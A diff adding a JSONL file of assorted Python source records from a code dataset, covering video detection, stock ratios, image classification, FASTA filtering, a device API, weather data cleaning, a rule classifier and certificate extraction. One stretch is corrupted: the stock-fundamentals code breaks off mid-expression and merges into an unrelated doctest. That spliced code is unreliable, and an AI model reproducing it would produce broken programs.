diff --git "a/4486.jsonl" "b/4486.jsonl" new file mode 100644--- /dev/null +++ "b/4486.jsonl" @@ -0,0 +1,657 @@ +{"seq_id":"21701584","text":"import time\nimport json\nimport cv2\nimport os\nfrom app.framework import QD_Process\nimport psutil\nimport torch\nimport sys\nimport signal\nimport warnings\nimport logging\nfrom multiprocessing import Queue,Process\n\ndef generate_response(code,app_name,video_url,error_string='',succeed=0,pid=None):\n if pid is None:\n return {'succeed':succeed,'app_name':app_name,'error_code':code,\n 'video_url':video_url,'error_string':error_string}\n else:\n return {'succeed':succeed,'app_name':app_name,'error_code':code,\n 'video_url':video_url,'error_string':error_string,'pid':pid}\n\ndef get_data(request,name):\n if request.method == 'POST':\n value=request.form[name]\n elif request.method == 'GET':\n value=request.args.get(name)\n else:\n return False,None\n\n return True,value\n\ndef detection(data):\n with open('config.json','r') as f:\n config=json.load(f)\n\n config['video_url']=data['video_url']\n config['task_name']=data['task_name']\n\n try:\n logging.info('parse others {}'.format(data['others']))\n others=json.loads(data['others'])\n for key,value in others.items():\n config['others'][key]=value\n logging.info('update others {}'.format(others))\n except:\n logging.warn('bad others format {}'.format(data['others']))\n\n try:\n pid=psutil.Process().pid\n config['redis_key']=str(pid)\n p=QD_Process(config)\n p.process()\n except Exception as e:\n raise Exception('cannot start task because {}'.format(e.__str__()))\n\n return 0\n\ndef detection_demo(data):\n def write_to_queue(config,q):\n worker=QD_Process(config)\n while True:\n try:\n flag,frame=worker.reader.read_from_queue()\n if flag:\n image,bbox=worker.detector.process(frame)\n if q.qsize()<3:\n q.put(image)\n else:\n q.get()\n q.put(image)\n else:\n q.put(None)\n break\n except Exception as e:\n q.put(None)\n raise Exception('cannot start demo because {}'.format(e.__str__()))\n break\n\n if data['task_name']:\n with open('config.json','r') as f:\n config=json.load(f)\n\n config['video_url']=data['video_url']\n config['task_name']=data['task_name']\n\n try:\n others=json.loads(data['others'])\n for key,value in others.items():\n config['others'][key]=value\n logging.info('update others {}'.format(others))\n except:\n logging.warn('bad others format {}'.format(data['others']))\n\n try:\n queue=Queue()\n pid=psutil.Process().pid\n config['redis_key']=str(pid)\n sub_process=Process(target=write_to_queue,args=(config,queue))\n sub_process.start()\n\n while True:\n image=queue.get()\n if image is not None:\n yield image\n else:\n logging.warn('terminate subprocess')\n sub_process.terminate()\n logging.warn('join subprocess')\n sub_process.join()\n logging.warn('raise exception')\n raise StopIteration('not image offered')\n\n except Exception as e:\n raise Exception('cannot start task because {}'.format(e.__str__()))\n else:\n raise Exception('no such task name')\n\ndef kill_all_subprocess(root_pid=None):\n \"\"\"\n kill all child process for root_pid\n if root_pid is not None:\n kill root_pid\n \"\"\"\n\n def kill_group(pid):\n \"\"\"\n kill pid and it's child\n \"\"\"\n p=psutil.Process(pid)\n childs=p.children()\n for c in childs:\n kill_group(c.pid)\n\n p.kill()\n\n p = psutil.Process(root_pid)\n childs=p.children()\n for c in childs:\n if c.status=='zombie':\n logging.info('wait zombie pid={}'.format(c.pid))\n pid,status=os.waitpid(c.pid,os.WNOHANG)\n else:\n kill_group(c.pid)\n\n if root_pid is None:\n if p.children():\n logging.info('wait pid={}'.format(p.pid))\n os.wait()\n logging.info('wait pid={}'.format(p.pid))\n else:\n p.kill()\n logging.info('wait pid={}'.format(p.pid))\n os.wait()\n logging.info('wait pid={}'.format(p.pid))\n torch.cuda.empty_cache()","sub_path":"web_utils.py","file_name":"web_utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619948925","text":"import pandas as pd\nimport sqlite3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly\nimport plotly.graph_objs as go\nimport datetime as dt\nimport time as tt\n\nfrom stocks.tools import get_datetime, convert_sql_date_to_datetime_date\n\n \nclass fundamentals:\n def __init__(self):\n pass\n\n def _get_keyratios(self):\n # load the entries for the current stock from the database\n cnx = sqlite3.connect('database/stocks_keyratios.db')\n sql = pd.read_sql_query(\"SELECT * FROM fundamentals WHERE ISIN = '{0}';\".format(self.isin), cnx)\n cnx.close() \n sql = sql.sort_values(by='year',ascending=False)\n sql = sql.reset_index(drop=True)\n \n self.keyratios = sql\n \n def _get_pe_for_year(self, pe_year, month=4, day=1, detailed=False):\n '''Get the price/earnings ratio for every day of the subsequent year'''\n # get the min/max date for selecting the quotes\n mindate = dt.date(pe_year+1, month, day) \n maxdate = dt.date(pe_year+2, month, day)\n\n # get the eps for the year under consideration\n eps = self.keyratios[self.keyratios.year==pe_year]['EarningsPerShare'].values[0]\n \n if eps is None:\n return None\n\n # extract the quote \n quote = self.quote[(self.quote.date>mindate) & (self.quote.date>> judge(0)\n 'Bad'\n >>> judge(59)\n 'Bad'\n >>> judge(60)\n 'Good'\n >>> judge(89)\n 'Good'\n >>> judge(90)\n 'Great'\n >>> judge(99)\n 'Great'\n >>> judge(100)\n 'Perfect'\n \"\"\"\n if score <= 59:\n return 'Bad'\n elif score <= 89:\n return 'Good'\n elif score <= 99:\n return 'Great'\n else:\n return 'Perfect'\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n solve()\n","sub_path":"atcoder/ABC/ABC028/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"360190071","text":"import os\nfrom scipy.misc import imresize\nfrom optimizer import *\nfrom PIL import Image\nimport pickle\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom conv_net import DeepConvNet\nfrom trainer import Trainer\n\nsave_file = '/dataset.pkl'\n\n\ndef cutout(image_origin, mask_size):\n image = np.copy(image_origin)\n image = image.transpose(1, 2, 0)\n mask_value = image.mean()\n\n h, w, _ = image.shape\n\n top = np.random.randint(0 - mask_size // 2, h - mask_size)\n left = np.random.randint(0 - mask_size // 2, w - mask_size)\n bottom = top + mask_size\n right = left + mask_size\n\n if top < 0:\n top = 0\n if left < 0:\n left = 0\n\n image[top:bottom, left:right, :].fill(mask_value)\n return image.transpose(2, 0, 1)\n\n\ndef scale_augmentation(image, scale_range=(256, 400), crop_size=227):\n scale_size = np.random.randint(*scale_range)\n image = imresize(image, (scale_size, scale_size))\n image = random_crop(image, (crop_size, crop_size))\n\n return image.transpose(2, 0, 1) # 軸の入れ替え.\n\n\ndef random_crop(image, crop_size=(227, 227)):\n h, w, _ = image.shape\n top = np.random.randint(0, h - crop_size[0])\n left = np.random.randint(0, w - crop_size[1])\n bottom = top + crop_size[0]\n right = left + crop_size[1]\n\n image = image[top:bottom, left:right, :]\n return image\n\n\ndef load_images(dir, max):\n filenames = [os.getcwd() + dir + '/' + filename\n for filename in os.listdir(os.getcwd() + dir)\n if not filename.startswith('.')] # そういうとこやぞ!Mac!!(.DB_Store対策)\n images = []\n\n for filename in filenames:\n try:\n print(filename)\n image = np.array(Image.open(filename), dtype=np.float32)\n\n if len(image.shape) < 3:\n continue\n if image.shape[2] != 3:\n continue\n\n image = scale_augmentation(image)\n images.append(image)\n except:\n print('LoadError')\n\n # Data augmentation.\n if len(images) < max:\n sample = random.choices(images, k=(max - len(images)))\n for img in sample:\n img = cutout(img, 110)\n images.append(img)\n\n # debug.\n print(len(images))\n\n return images\n\n\ndef _change_one_hot_label(X):\n T = np.zeros((X.size, 3))\n for idx, row in enumerate(T):\n row[X[idx]] = 1\n\n return T\n\n\ndef init_dataset():\n dataset = {}\n\n dog_list = np.concatenate(load_images('/dog', 3000), axis=0)\n cat_list = np.concatenate(load_images('/cat', 3000), axis=0)\n person_list = np.concatenate(load_images('/person', 3000), axis=0)\n\n # debug.\n print(dog_list.shape)\n print(cat_list.shape)\n print(person_list.shape)\n\n X = np.concatenate([dog_list, cat_list, person_list], axis=0)\n X = X.reshape(-1, 3, 227, 227)\n\n t = np.concatenate([np.zeros(int(dog_list.shape[0] / 3)),\n np.ones(int(cat_list.shape[0] / 3)),\n np.full(int(person_list.shape[0] / 3), 2)],\n axis=0)\n\n # データセットをシャッフル.\n for l in [X, t]:\n np.random.seed(1)\n np.random.shuffle(l)\n\n dataset['img'] = X\n dataset['label'] = t\n\n with open(os.getcwd() + save_file, 'wb') as f:\n pickle.dump(dataset, f, -1)\n print('Done')\n\n\ndef load_dataset(normalize=True, one_hot_label=False):\n if not os.path.exists(os.getcwd() + save_file):\n print('Initializing')\n init_dataset()\n\n with open(os.getcwd() + save_file, 'rb') as f:\n dataset = pickle.load(f)\n\n # 正規化.\n if normalize:\n dataset['img'] = dataset['img'].astype(np.float32)\n dataset['img'] /= 255.0\n\n # 必要があればワンホットベクトルに変換.\n if one_hot_label:\n dataset['label'] = _change_one_hot_label(dataset['label'])\n\n dataset['label'] = dataset['label'].astype(np.int64)\n print(len(dataset['label']))\n\n # (訓練画像, 訓練ラベル), (テスト画像, テストラベル)に分ける.\n return train_test_split(dataset['img'], dataset['label'], test_size=0.3)\n\n\n# データセット読み込み.\nX_train, X_test, t_train, t_test = load_dataset()\n\nnetwork = DeepConvNet()\ntrainer = Trainer(network, X_train, t_train, X_test, t_test,\n epochs=50, mini_batch_size=100,\n optimizer='Adam', optimizer_param={'lr': 0.001},\n evaluate_sample_num_per_epoch=1000)\nprint('training start.')\ntrainer.train()\n\nnetwork.save_params('deep_convnet_params.pkl')\nprint('All done !!')\n","sub_path":"train_conv.py","file_name":"train_conv.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"61667658","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport sys\nfrom Bio import SeqIO\n\nparser = argparse.ArgumentParser(description=\"Search for pattern in fasta header and return sequences whose header includes (or does not include) the match\")\n\nparser.add_argument('--fasta', required=True, help='input fasta file', action='store')\nparser.add_argument('--pattern', required=True, help='pattern to match in header', action='store')\nparser.add_argument('--complement', required=False, default=False, help='Select only sequences that do not match the pattern', action='store_true')\n\nargs=parser.parse_args()\n\n# read in sequences\nrecords = list(SeqIO.parse(args.fasta, \"fasta\"))\n\n# create empty lists\nfound_sequences = []\nmissing_sequences = []\n\n# If --complement is provided, return sequences that do not match the search string. Otherwise return matches.\n\nfor record in records:\n\n if re.search(args.pattern, record.description):\n found_sequences.append(record)\n else:\n missing_sequences.append(record)\n\n# If search pattern is not found in any header, print error message only\n# If search pattern is found, print sequences that match (or do not match, if --complement argument is provided) to screen\n\nif args.complement:\n if len(missing_sequences) == len(records):\n print(\"ERROR: Could not find \" + args.pattern + \" in any fasta header!\", file=sys.stderr)\n else:\n print(\"Writing out %i sequences that DO NOT match the search string!\" % len(missing_sequences), file=sys.stderr)\n SeqIO.write(missing_sequences, sys.stdout, \"fasta\")\nelse:\n print(\"Writing out %i sequences that match the search string!\" % len(found_sequences), file=sys.stderr)\n SeqIO.write(found_sequences, sys.stdout, \"fasta\")\n\n","sub_path":"scripts/split_fasta_by_header_pattern.py","file_name":"split_fasta_by_header_pattern.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"457701212","text":"import re\nimport sys\nfrom collections import Counter\n\nTOP_COUNT = 10\n\n\ndef load_data(filepath):\n text = ''\n with open(filepath, 'r') as infile:\n text = infile.read()\n return text\n\n\ndef get_most_frequent_words(text):\n text = text.lower()\n # Removing special symbols\n text = re.sub('\\W+', ' ', text)\n words = list(filter(None, text.split(' ')))\n c = Counter(words).most_common()\n return list(map(lambda x_y: (x_y[0], x_y[1] / len(words)), c))\n\n\nif __name__ == '__main__':\n filepath = sys.argv[1]\n for word, frequency in get_most_frequent_words(load_data(filepath))[:TOP_COUNT]:\n print('{} - {}'.format(word, frequency))\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561140644","text":"import falcon\r\nimport subprocess\r\n\r\nfrom bot_python_sdk.action_service import ActionService\r\nfrom bot_python_sdk.configuration_service import ConfigurationService\r\nfrom bot_python_sdk.configuration_store import ConfigurationStore\r\nfrom bot_python_sdk.device_status import DeviceStatus\r\nfrom bot_python_sdk.logger import Logger\r\n\r\nLOCATION = 'Controller'\r\nINCOMING_REQUEST = 'Incoming request: '\r\n\r\nDEVICE_ID_KEY = 'deviceId'\r\nMAKER_ID_KEY = 'makerId'\r\nPUBLIC_KEY_KEY = 'publicKey'\r\n\r\nACTION_ID = 'actionID'\r\nVALUE_KEY = 'value'\r\n\r\nMETHOD_GET = 'GET'\r\nMETHOD_POST = 'POST'\r\nACTIONS_ENDPOINT = '/actions'\r\nPAIRING_ENDPOINT = '/pairing'\r\n\r\n\"\"\" Error Text \"\"\"\r\nERROR_TRIGGER = 'Not allowed to trigger actions when device is not activated.'\r\nERROR_PAIRED = 'Device is already paired.'\r\nERROR_ACTION_ID = 'Missing parameter `' + ACTION_ID + '` for ' + METHOD_POST + ' ' + ACTIONS_ENDPOINT\r\n\r\n\r\nclass BaseUtilHandler:\r\n def __init__(self):\r\n self.configuration_store = ConfigurationStore()\r\n\r\n @staticmethod\r\n def call_error_logger(error, has_desc):\r\n Logger.error(LOCATION, error)\r\n if has_desc:\r\n raise falcon.HTTPForbidden(description=error)\r\n else:\r\n raise falcon.HTTPBadRequest\r\n\r\n @staticmethod\r\n def call_info_logger(call_type, endpoint):\r\n Logger.info(LOCATION, INCOMING_REQUEST + call_type + ' ' + endpoint)\r\n\r\n def check_device_status(self, config_status, expected_status, pair):\r\n if config_status is not expected_status:\r\n self.call_error_logger(ERROR_PAIRED, True) if pair else self.call_error_logger(ERROR_TRIGGER, True)\r\n\r\n\r\nclass ActionsResource(BaseUtilHandler):\r\n def __init__(self):\r\n self.action_service = ActionService()\r\n super().__init__(self)\r\n\r\n def on_get(self, request, response):\r\n self.call_info_logger(METHOD_GET, ACTIONS_ENDPOINT)\r\n response.media = self.action_service.get_actions()\r\n\r\n def on_post(self, request, response):\r\n configuration = self.configuration_store.get()\r\n self.check_device_status(configuration.get_device_status(), DeviceStatus.ACTIVE, False)\r\n self.call_info_logger(METHOD_POST, ACTIONS_ENDPOINT)\r\n\r\n data = request.media\r\n if ACTION_ID not in data.keys():\r\n self.call_error_logger(ERROR_ACTION_ID, False)\r\n\r\n action_id = data[ACTION_ID]\r\n value = data[VALUE_KEY] if VALUE_KEY in data.keys() else None\r\n success = self.action_service.trigger(action_id, value)\r\n if success:\r\n response.media = {'message': 'Action triggered'}\r\n else:\r\n raise falcon.HTTPServiceUnavailable\r\n\r\n\r\nclass PairingResource(BaseUtilHandler):\r\n\r\n def on_get(self, request, response):\r\n self.call_info_logger(METHOD_GET, PAIRING_ENDPOINT)\r\n configuration = self.configuration_store.get()\r\n self.check_device_status(configuration.get_device_status(), DeviceStatus.NEW, True)\r\n response.media = configuration.get_device_information\r\n subprocess.Popen(['make', 'pair'])\r\n\r\n\r\napi = application = falcon.API()\r\napi.add_route(ACTIONS_ENDPOINT, ActionsResource())\r\napi.add_route(PAIRING_ENDPOINT, PairingResource())\r\nConfigurationService().resume_configuration()\r\n","sub_path":"bot_python_sdk/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"354939195","text":"import pandas as pd\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import stats \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom itertools import cycle\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom scipy import interp\r\n\r\n# Cleaning Energy data for Office Jolie PrimClass_Jaylin\r\ndata = pd.read_csv('E:\\Thesis\\Dataset\\Working Directory\\E2015.csv')\r\ndata = data[['Year','timestamp','PrimClass_Javier']]\r\n# Renaming columns\r\ndata.columns = ['Year','timestamp','Energy consumption']\r\n\r\n# Cleaning Weather data.\r\ndf = pd.read_csv('E:\\Thesis\\Dataset\\Working Directory\\w1.csv')\r\ndf.head()\r\ndf.describe()\r\ndata1 = df.iloc[0:16016,0:18]\r\ndata1[['Hour','Minutes']] = data1.Time.str.split(\":\", expand= True)\r\ndata1[['Date','Time']] = data1.Timestamp.str.split(\" \", expand= True)\r\ndata1 = data1[data1.Minutes!= '20']\r\ndata1 = data1.reset_index()\r\ndata1.drop(columns={'index','DateUTC
','Timestamp.1','Minutes'}, axis=1, inplace = True)\r\ndata = pd.concat([data,data1], sort = True, axis=1)\r\n\r\n\r\n#Counting number of NA in dataframe\r\ndata.isnull().sum()\r\ndata.notnull().sum()\r\n\r\n# Removing the NA values from dataframe\r\ndata.drop(columns={'Events','TimeBST','TimeGMT','Precipitationmm','Gust SpeedKm/h','Time'}, axis=1, inplace=True)\r\ndata.rename(columns = {'Dew PointC':'Dew_PointC','Sea Level PressurehPa':'Sea_Level_PressurehPa','Wind Direction':'Wind_Direction','Wind SpeedKm/h':'Wind_Speed_in_KMperHour','Energy consumption':'Energy_consumption'}, inplace=True)\r\ndata.isnull().sum()\r\n\r\n\r\n# Data Cleaning \r\n#Coding Wind Speed into numeric values.\r\ndata['Wind_Speed_in_KMperHour'].replace('Calm','0',inplace=True)\r\ndata.Wind_Speed_in_KMperHour = pd.to_numeric(data.Wind_Speed_in_KMperHour,errors='coerce')\r\ndata['Hour']=data.Hour.astype('float64')\r\ndata.dtypes\r\n \r\n\r\n# Encoding for catagorical data\r\n\r\ndata.Conditions.unique()\r\ndata['Conditions'].replace('Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Snow','Rain',inplace=True)\r\ndata['Conditions'].replace('Thunderstorms and Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Thunderstorms with Small Hail','Rain',inplace=True)\r\ndata['Conditions'].replace('Haze','Rain',inplace=True)\r\ndata['Conditions'].replace('Mist','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Shallow Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Thunderstorm','Rain',inplace=True)\r\ndata['Conditions'].replace('Patches of Fog','Rain',inplace=True)\r\n\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['SW', 'SSW','WSW'], 'SW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['SSE', 'ESE'], 'SE')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['WSW'], 'SW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['Variable'], 'Calm')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['NNW','WNW'], 'NW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['ENE','NNE'], 'Calm')\r\ndata.Conditions.unique()\r\ndata.Wind_Direction.unique()\r\n\r\n# Removing dummy variables \r\ndata = data[data.VisibilityKm != -9999]\r\ndata = data.reset_index(drop = True)\r\ndata = data.drop(columns={'Year','timestamp','Timestamp','Date'})\r\n\r\n\r\n# Plotting the classes of dependent variable\r\nplt.figure(figsize=(8, 6))\r\nsns.countplot('Conditions', data=data)\r\nplt.title('Balanced Classes')\r\nplt.show()\r\n\r\n\r\n# Plotting the classes of dependent variable\r\nplt.figure(figsize=(8, 6))\r\nsns.countplot('Wind_Direction', data=data)\r\nplt.title('Balanced Classes')\r\nplt.show()\r\n\r\nplotdata = data\r\n\r\n# Label encoding of dependent variables\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nbin_cols = data.nunique()[data.nunique() <= 9].keys().tolist()\r\nle = LabelEncoder()\r\nfor i in bin_cols :\r\n data[i] = le.fit_transform(data[i])\r\n\r\n\r\nbin_cols = data.nunique()[data.nunique() <= 9].keys().tolist()\r\nle = LabelEncoder()\r\nfor i in bin_cols :\r\n data[i] = le.fit_transform(data[i])\r\ndata.Wind_Direction.unique()\r\n\r\n\r\n# Exploratory Data Analysis.\r\n\r\n# Co-Relation Plot 1 \r\n \r\ndef heatmap(x, y, size):\r\n fig, ax = plt.subplots()\r\n \r\n # Mapping from column names to integer coordinates\r\n x_labels = [v for v in sorted(x.unique())]\r\n y_labels = [v for v in sorted(y.unique())]\r\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)} \r\n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)} \r\n \r\n size_scale = 500\r\n ax.scatter(\r\n x=x.map(x_to_num), \r\n y=y.map(y_to_num), \r\n s=size * size_scale, \r\n marker='s' \r\n )\r\n # Show column labels on the axes\r\n ax.set_xticks([x_to_num[v] for v in x_labels])\r\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\r\n ax.set_yticks([y_to_num[v] for v in y_labels])\r\n ax.set_yticklabels(y_labels)\r\n \r\ncolumns = ['Energy_consumption', 'Dew_PointC','TemperatureC', 'Humidity', 'Sea_Level_PressurehPa', 'VisibilityKm','Wind_Speed_in_KMperHour','WindDirDegrees','Hour'] \r\ncorr = data[columns].corr()\r\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\r\ncorr.columns = ['x', 'y', 'value']\r\nheatmap(\r\n x=corr['x'],\r\n y=corr['y'],\r\n size=corr['value'].abs()\r\n) \r\n\r\n# Co-Relation Plot 2\r\n\r\nf, ax = plt.subplots(figsize=(10, 8))\r\ncorr = data.corr()\r\nsns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True),\r\n square=True, ax=ax)\r\n\r\n\r\n\r\n# Box plots\r\n# Run for each variable separately\r\n\r\nsns.boxplot(data=data.VisibilityKm)\r\nsns.boxplot(data=data.TemperatureC)\r\nsns.boxplot(data=data.Dew_PointC)\r\nsns.boxplot(data=data.Humidity)\r\nsns.boxplot(data=data.Sea_Level_PressurehPa)\r\nsns.boxplot(data=data.WindDirDegrees)\r\nsns.boxplot(data=data.Energy_consumption)\r\nsns.boxplot(data=data.Wind_Speed_in_KMperHour)\r\n\r\n\r\n\r\n# Variable Distribution plots\r\n# Run for each variable separately\r\n\r\nplot = plotdata.iloc[:,1]\r\nsns.distplot(plot);\r\nplot = plotdata.iloc[:,2]\r\nsns.distplot(plot, hist=False, rug=True);\r\nplot = plotdata.iloc[:,3]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,4]\r\nsns.distplot(plot, kde=False, fit=stats.gamma);\r\nplot = plotdata.iloc[:,5]\r\nsns.distplot(plot, kde=False, fit=stats.gamma);\r\nplot = plotdata.iloc[:,6]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,7]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,8]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,9]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,10]\r\nsns.kdeplot(plot, shade=True);\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PreprocessingW1.py","file_name":"PreprocessingW1.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"555420002","text":"'''\nCreated on 07 Nov 2018\n\n@author: danhbuithi\n'''\nimport heapq\nimport numpy as np\nfrom rule_based_classifiers.RuleListClassifier import RuleListClassifier,\\\n SingleRuleBasedClassifier\n\n\nclass CBA(object):\n '''\n classdocs\n '''\n\n\n def __init__(self):\n '''\n Constructor\n '''\n \n '''\n Create a heap to keep rules which are candidates for classifier.\n Each element is a tuple consisting of confidence, support and rule.\n '''\n def _createQueue(self, rule_list):\n Q = []\n for x in rule_list:\n heapq.heappush(Q, (-x['ins'], -x['sup'], len(x['r'].left_items), x['r'])) \n return Q\n \n '''\n Build classifier (a list of rules) by pruning rules\n '''\n def fit(self, train_data, rule_list, labels):\n selected_rules = []\n Q = self._createQueue(rule_list)\n remove_markers = np.zeros(train_data.size())\n \n error_by_rules = 0.0\n indices = np.where(remove_markers == 0)[0]\n while Q and len(indices) > 0:\n \n rule_tuple = heapq.heappop(Q)\n rule = rule_tuple[-1]\n \n \n is_marked = False\n local_error_by_rule = 0.0\n \n '''\n Find transactions satisfy the rule\n '''\n satisified_indices = []\n for i in indices:\n d = train_data.get_transaction(i)\n if rule.is_satisfied(d):\n satisified_indices.append(i)\n if train_data.data_labels[i] in rule.right_items:\n is_marked = True\n else:\n local_error_by_rule += 1\n '''\n If there's at least a transaction be classified correctly, then choose the rule\n '''\n if is_marked == False: continue\n \n error_by_rules += local_error_by_rule\n for i in satisified_indices:\n remove_markers[i] = 1 \n \n '''\n Update un-classified sample list\n '''\n indices = np.where(remove_markers == 0)[0]\n \n \n '''\n Select default class in the case this rule is the last rule in selection.\n '''\n default_class_count = 0\n default_class_name = None \n if len(indices) > 0:\n default_class_name, default_class_count = RuleListClassifier.localDefaultClass(train_data, indices)\n \n \n '''\n Add rule and its probability into the selected list\n '''\n adding_rule = ({'r':rule, 'ins':-rule_tuple[0], 'sup':-rule_tuple[1]}, \n {'r': default_class_name, 'ins': 1.0}, \n default_class_count + error_by_rules)\n selected_rules.append(adding_rule)\n \n '''\n Finalize the selected rules --> create model.\n '''\n p = selected_rules.index(min(selected_rules, key = lambda x: x[2]))\n model = [x[0] for x in selected_rules[:p+1]]\n default_class = selected_rules[p][1]\n \n '''\n If the selected rules cover whole data set, then choose the majority class as default class.\n ''' \n if (default_class['r'] is None):\n temp_default_class, _ = RuleListClassifier.globalDefaultClass(train_data)\n default_class = {'r':temp_default_class, 'ins': 1.0}\n \n return SingleRuleBasedClassifier(model, labels, default_class)\n \n ","sub_path":"rule_based_classifiers/CBA.py","file_name":"CBA.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"182423873","text":"import sys\nimport os\nimport errno\nimport time\nimport json\nimport logging\nfrom base64 import b64decode\n\nimport pem\nfrom OpenSSL import crypto\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\ndef extract_certificates_from_acme(acme_file):\n # Read JSON file\n data = json.loads(open(acme_file).read())\n certs = data['Certificates']\n\n # Loop over all certificates\n for c in certs:\n # Decode private key, certificate and chain\n privatekey = b64decode(c['Key']).decode('utf-8')\n fullchain = b64decode(c['Certificate']).decode('utf-8')\n start = fullchain.find('-----BEGIN CERTIFICATE-----', 1)\n cert = fullchain[0:start]\n chain = fullchain[start:]\n\n # Create PKCS#12 certificate archive\n pkcs12 = crypto.PKCS12()\n pkcs12.set_privatekey(crypto.load_privatekey(crypto.FILETYPE_PEM, privatekey))\n pkcs12.set_certificate(crypto.load_certificate(crypto.FILETYPE_PEM, cert))\n ca_certs = [crypto.load_certificate(crypto.FILETYPE_PEM, c.as_bytes()) for c in pem.parse(bytes(chain, encoding='utf-8'))]\n pkcs12.set_ca_certificates(ca_certs)\n pfx = pkcs12.export()\n\n # Create domain directory if it doesn't exist\n directory = 'certs/' + c['Domain']['Main'] + '/'\n try:\n os.makedirs(directory)\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n\n # Write private key, certificate and chain to file\n with open(directory + 'privkey.pem', 'w') as f:\n f.write(privatekey)\n with open(directory + 'cert.pem', 'w') as f:\n f.write(cert)\n with open(directory + 'chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + 'fullchain.pem', 'w') as f:\n f.write(fullchain)\n with open(directory + 'cert.pfx', 'wb') as f:\n f.write(pfx)\n\n # Write private key, certificate and chain to flat files\n directory = 'certs_flat/'\n\n with open(directory + c['Domain']['Main'] + '.key', 'w') as f:\n f.write(privatekey)\n with open(directory + c['Domain'] ['Main']+ '.crt', 'w') as f:\n f.write(fullchain)\n with open(directory + c['Domain']['Main'] + '.chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + c['Domain']['Main'] + '.pfx', 'wb') as f:\n f.write(pfx)\n\n if c['Domain']['SANs']:\n for name in c['Domain']['SANs']:\n with open(directory + name + '.key', 'w') as f:\n f.write(privatekey)\n with open(directory + name + '.crt', 'w') as f:\n f.write(fullchain)\n with open(directory + name + '.chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + name + '.pfx', 'wb') as f:\n f.write(pfx)\n\n print('Extracted certificate for: ' + c['Domain']['Main'] + (', ' + ', '.join(c['Domain']['SANs']) if c['Domain']['SANs'] else ''))\n\n\nclass AcmeFileHandler(FileSystemEventHandler):\n def on_created(self, event):\n self.handle(event)\n\n def on_modified(self, event):\n self.handle(event)\n\n def handle(self, event):\n # Check if it's a JSON file\n if not event.is_directory and event.src_path.endswith('acme.json'):\n logging.info('Certificates changed')\n extract_certificates_from_acme(event.src_path)\n\nif __name__ == \"__main__\":\n # Determine path to watch\n path = sys.argv[1] if len(sys.argv) > 1 else './data'\n\n # Create output directories if it doesn't exist\n try:\n os.makedirs('certs')\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n 